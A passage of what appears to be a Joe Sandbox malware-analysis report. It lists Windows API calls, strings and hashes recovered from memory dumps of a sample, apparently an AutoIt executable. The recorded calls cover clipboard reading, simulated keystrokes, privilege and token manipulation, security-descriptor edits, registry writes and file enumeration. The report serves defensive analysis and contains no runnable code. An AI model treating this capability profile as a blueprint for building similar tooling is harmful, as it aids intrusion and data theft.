                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 466773f87dd7e34b16bd27a90b0fff19a8e4343ac646f8186d96f2e87546097e
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 4A31F370A00915DFE718DF48E5849A9F7A6FF59300B258AA5E849CB752D730EDC1CF80
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 039422B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: 19c5cb660c2a693928b98bbd12a1aecc78d73170b46c06cf7b56c0b093bfb65f
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: D6E0E67494010EDFDB00EFB8D54969E7FB4FF04301F1005A1FD01D2280D6309D508A72
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0068CE50
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CE91
                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0068CED6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068CF00
                                                    • SendMessageW.USER32 ref: 0068CF29
                                                    • _wcsncpy.LIBCMT ref: 0068CFA1
                                                    • GetKeyState.USER32(00000011), ref: 0068CFC2
                                                    • GetKeyState.USER32(00000009), ref: 0068CFCF
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CFE5
                                                    • GetKeyState.USER32(00000010), ref: 0068CFEF
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068D018
                                                    • SendMessageW.USER32 ref: 0068D03F
                                                    • SendMessageW.USER32(?,00001030,?,0068B602), ref: 0068D145
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0068D15B
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0068D16E
                                                    • SetCapture.USER32(?), ref: 0068D177
                                                    • ClientToScreen.USER32(?,?), ref: 0068D1DC
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0068D1E9
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0068D203
                                                    • ReleaseCapture.USER32 ref: 0068D20E
                                                    • GetCursorPos.USER32(?), ref: 0068D248
                                                    • ScreenToClient.USER32(?,?), ref: 0068D255
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D2B1
                                                    • SendMessageW.USER32 ref: 0068D2DF
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D31C
                                                    • SendMessageW.USER32 ref: 0068D34B
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0068D36C
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0068D37B
                                                    • GetCursorPos.USER32(?), ref: 0068D39B
                                                    • ScreenToClient.USER32(?,?), ref: 0068D3A8
                                                    • GetParent.USER32(?), ref: 0068D3C8
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D431
                                                    • SendMessageW.USER32 ref: 0068D462
                                                    • ClientToScreen.USER32(?,?), ref: 0068D4C0
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0068D4F0
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D51A
                                                    • SendMessageW.USER32 ref: 0068D53D
                                                    • ClientToScreen.USER32(?,?), ref: 0068D58F
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0068D5C3
                                                      • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068D65F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F$prl
                                                    • API String ID: 3977979337-212714731
                                                    • Opcode ID: 47cf5b37665722102830c1d2d1d97a56a9b81a3a05ef4c7006da71c34de5d5de
                                                    • Instruction ID: f8dddfd67932aa9eb754a8f94089af37c2fc60cc4148458e3bcdacb2413a0f28
                                                    • Opcode Fuzzy Hash: 47cf5b37665722102830c1d2d1d97a56a9b81a3a05ef4c7006da71c34de5d5de
                                                    • Instruction Fuzzy Hash: 12429C70204241AFD725EF28C888FAABBE7FF49324F14071DF695872A1D7719851CBA6
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0068873F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 73a4f793928241e48f63f9d1e61be4011f47e7dca3cbb440b876847fe8b25195
                                                    • Instruction ID: e73f96eeb7a707a0b48e87dbb824c8a9216354506e409aec40f5f9af15f73105
                                                    • Opcode Fuzzy Hash: 73a4f793928241e48f63f9d1e61be4011f47e7dca3cbb440b876847fe8b25195
                                                    • Instruction Fuzzy Hash: 7312B071540214AFEB25AF24DC49FAE7BBAEF85310F644229F915EB2E1EF708941CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memset
                                                    • String ID: 0wk$DEFINE$Oaa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                    • API String ID: 1357608183-1522621379
                                                    • Opcode ID: 71384e9b7bfc5ece41b52dace7242bd380ecf43e4924f7b28782ba67cbfcd934
                                                    • Instruction ID: bb9dbf79a9f669e7ef16c6eb0a4786a837c5eb04edc079857c0dcd82ac81715d
                                                    • Opcode Fuzzy Hash: 71384e9b7bfc5ece41b52dace7242bd380ecf43e4924f7b28782ba67cbfcd934
                                                    • Instruction Fuzzy Hash: AF939171A04216DFDB24CF58C891BEDB7B2FF48715F24816AE955AB380E7709E86CB40
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00604A3D
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0063DA8E
                                                    • IsIconic.USER32(?), ref: 0063DA97
                                                    • ShowWindow.USER32(?,00000009), ref: 0063DAA4
                                                    • SetForegroundWindow.USER32(?), ref: 0063DAAE
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0063DAC4
                                                    • GetCurrentThreadId.KERNEL32 ref: 0063DACB
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0063DAD7
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0063DAE8
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0063DAF0
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0063DAF8
                                                    • SetForegroundWindow.USER32(?), ref: 0063DAFB
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB10
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB1B
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB25
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB2A
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB33
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB38
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB42
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB47
                                                    • SetForegroundWindow.USER32(?), ref: 0063DB4A
                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0063DB71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: 6f76c32e119e678b13794a12a55ef5b52e402dabb40435309f711de437b32fdb
                                                    • Instruction ID: 3d06a44c0bb180c6517a800e5d5add8a522e41b9948e0067a3f0a61f80d81cce
                                                    • Opcode Fuzzy Hash: 6f76c32e119e678b13794a12a55ef5b52e402dabb40435309f711de437b32fdb
                                                    • Instruction Fuzzy Hash: A931C871A80318BFEB206F619C49FBF7E6EEB44B50F114135FA01E61D0D6B05D41ABA1
                                                    APIs
                                                      • Part of subcall function 00658CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00658D0D
                                                      • Part of subcall function 00658CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658D3A
                                                      • Part of subcall function 00658CC3: GetLastError.KERNEL32 ref: 00658D47
                                                    • _memset.LIBCMT ref: 0065889B
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006588ED
                                                    • CloseHandle.KERNEL32(?), ref: 006588FE
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00658915
                                                    • GetProcessWindowStation.USER32 ref: 0065892E
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00658938
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00658952
                                                      • Part of subcall function 00658713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658851), ref: 00658728
                                                      • Part of subcall function 00658713: CloseHandle.KERNEL32(?,?,00658851), ref: 0065873A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 435a05714f3d6858217a76fddc0b6cceaeb72cc8fe14911809e9a8195bdad3cf
                                                    • Instruction ID: 0014a142bf6c7bb3843d25b26c1bf85e39eec3738b0fa474b27565fb9a04f1db
                                                    • Opcode Fuzzy Hash: 435a05714f3d6858217a76fddc0b6cceaeb72cc8fe14911809e9a8195bdad3cf
                                                    • Instruction Fuzzy Hash: 2C814871900249BFDF11DFA4DC45AEE7BBAEF08305F18426AFD10B7661DB318A589B60
                                                    APIs
                                                    • OpenClipboard.USER32(0068F910), ref: 00674284
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00674292
                                                    • GetClipboardData.USER32(0000000D), ref: 0067429A
                                                    • CloseClipboard.USER32 ref: 006742A6
                                                    • GlobalLock.KERNEL32(00000000), ref: 006742C2
                                                    • CloseClipboard.USER32 ref: 006742CC
                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 006742E1
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 006742EE
                                                    • GetClipboardData.USER32(00000001), ref: 006742F6
                                                    • GlobalLock.KERNEL32(00000000), ref: 00674303
                                                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00674337
                                                    • CloseClipboard.USER32 ref: 00674447
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 8242fc28941ff24b1e8c8cea67e348b74684dff510aaa761e4fb52faaffc31ca
                                                    • Instruction ID: 4793c6731e9fd352e9a7e76985a720ca3a40588b95baacd263f271c91a727609
                                                    • Opcode Fuzzy Hash: 8242fc28941ff24b1e8c8cea67e348b74684dff510aaa761e4fb52faaffc31ca
                                                    • Instruction Fuzzy Hash: E651A331244301ABD700EF64DC99FAF77AAAF44B10F10462DF55AD22E2DF70DA058B66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0066C9F8
                                                    • FindClose.KERNEL32(00000000), ref: 0066CA4C
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066CA71
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066CA88
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0066CAAF
                                                    • __swprintf.LIBCMT ref: 0066CAFB
                                                    • __swprintf.LIBCMT ref: 0066CB3E
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • __swprintf.LIBCMT ref: 0066CB92
                                                      • Part of subcall function 006238D8: __woutput_l.LIBCMT ref: 00623931
                                                    • __swprintf.LIBCMT ref: 0066CBE0
                                                      • Part of subcall function 006238D8: __flsbuf.LIBCMT ref: 00623953
                                                      • Part of subcall function 006238D8: __flsbuf.LIBCMT ref: 0062396B
                                                    • __swprintf.LIBCMT ref: 0066CC2F
                                                    • __swprintf.LIBCMT ref: 0066CC7E
                                                    • __swprintf.LIBCMT ref: 0066CCCD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: a9d70fb41db429cf006e4b62a75f16acd48adfeafeb8c8f9736a3ffefd69c0fb
                                                    • Instruction ID: 7abd8850e377b227ee6e70c5d1ee10b70e03a44121eeb64a561515b14b2b87df
                                                    • Opcode Fuzzy Hash: a9d70fb41db429cf006e4b62a75f16acd48adfeafeb8c8f9736a3ffefd69c0fb
                                                    • Instruction Fuzzy Hash: 1FA14FB1548304ABC744EBA4C985DAFB7EEEF94700F40491DF586C7192EB34DA48CB66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0066F221
                                                    • _wcscmp.LIBCMT ref: 0066F236
                                                    • _wcscmp.LIBCMT ref: 0066F24D
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0066F25F
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0066F279
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0066F291
                                                    • FindClose.KERNEL32(00000000), ref: 0066F29C
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0066F2B8
                                                    • _wcscmp.LIBCMT ref: 0066F2DF
                                                    • _wcscmp.LIBCMT ref: 0066F2F6
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066F308
                                                    • SetCurrentDirectoryW.KERNEL32(006BA5A0), ref: 0066F326
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F330
                                                    • FindClose.KERNEL32(00000000), ref: 0066F33D
                                                    • FindClose.KERNEL32(00000000), ref: 0066F34F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: b8c79bc911ee91d9590c4f90e1d6a33674079d157c00df2f2ca44a4af5ac22e2
                                                    • Instruction ID: 79fe2ad630b706fbb2929031af4bf1db94fd9116a89ccf317fcb2b239ee91415
                                                    • Opcode Fuzzy Hash: b8c79bc911ee91d9590c4f90e1d6a33674079d157c00df2f2ca44a4af5ac22e2
                                                    • Instruction Fuzzy Hash: C231B1765012197ADB20DBF4EC69ADE73AE9F48360F100275E810E3290EB71DB858FA4
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680BDE
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0068F910,00000000,?,00000000,?,?), ref: 00680C4C
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00680C94
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00680D1D
                                                    • RegCloseKey.ADVAPI32(?), ref: 0068103D
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0068104A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: 5bcfd17acc9a694275f6020674e2056470c800804fff5e6e0d272dc93f051ba5
                                                    • Instruction ID: dbd6db45e919a08df5769e2bc6fc993465f12ed4a0b5e758c03656c1a9eb8064
                                                    • Opcode Fuzzy Hash: 5bcfd17acc9a694275f6020674e2056470c800804fff5e6e0d272dc93f051ba5
                                                    • Instruction Fuzzy Hash: 0602AC752006119FCB54EF18C881E6AB7E6FF89714F04895DF88A9B3A2CB30EC41CB85
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0066F37E
                                                    • _wcscmp.LIBCMT ref: 0066F393
                                                    • _wcscmp.LIBCMT ref: 0066F3AA
                                                      • Part of subcall function 006645C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006645DC
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0066F3D9
                                                    • FindClose.KERNEL32(00000000), ref: 0066F3E4
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0066F400
                                                    • _wcscmp.LIBCMT ref: 0066F427
                                                    • _wcscmp.LIBCMT ref: 0066F43E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066F450
                                                    • SetCurrentDirectoryW.KERNEL32(006BA5A0), ref: 0066F46E
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F478
                                                    • FindClose.KERNEL32(00000000), ref: 0066F485
                                                    • FindClose.KERNEL32(00000000), ref: 0066F497
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: bd29365e20c5579096d8d822a9592a96c7d7beb4900f3e262fa6eda40469d97e
                                                    • Instruction ID: 6a8c259ce7baf41055d1b9dd1681b7db2418919af1fb3b6b007c71776dd9a3ed
                                                    • Opcode Fuzzy Hash: bd29365e20c5579096d8d822a9592a96c7d7beb4900f3e262fa6eda40469d97e
                                                    • Instruction Fuzzy Hash: 3831B5725012197BCF10ABA4FC98ADE77AF9F49360F100275E850E32A1DB75DE85CBA4
                                                    APIs
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658766
                                                      • Part of subcall function 0065874A: GetLastError.KERNEL32(?,0065822A,?,?,?), ref: 00658770
                                                      • Part of subcall function 0065874A: GetProcessHeap.KERNEL32(00000008,?,?,0065822A,?,?,?), ref: 0065877F
                                                      • Part of subcall function 0065874A: HeapAlloc.KERNEL32(00000000,?,0065822A,?,?,?), ref: 00658786
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0065879D
                                                      • Part of subcall function 006587E7: GetProcessHeap.KERNEL32(00000008,00658240,00000000,00000000,?,00658240,?), ref: 006587F3
                                                      • Part of subcall function 006587E7: HeapAlloc.KERNEL32(00000000,?,00658240,?), ref: 006587FA
                                                      • Part of subcall function 006587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00658240,?), ref: 0065880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0065825B
                                                    • _memset.LIBCMT ref: 00658270
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065828F
                                                    • GetLengthSid.ADVAPI32(?), ref: 006582A0
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 006582DD
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006582F9
                                                    • GetLengthSid.ADVAPI32(?), ref: 00658316
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00658325
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0065832C
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065834D
                                                    • CopySid.ADVAPI32(00000000), ref: 00658354
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00658385
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006583AB
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006583BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
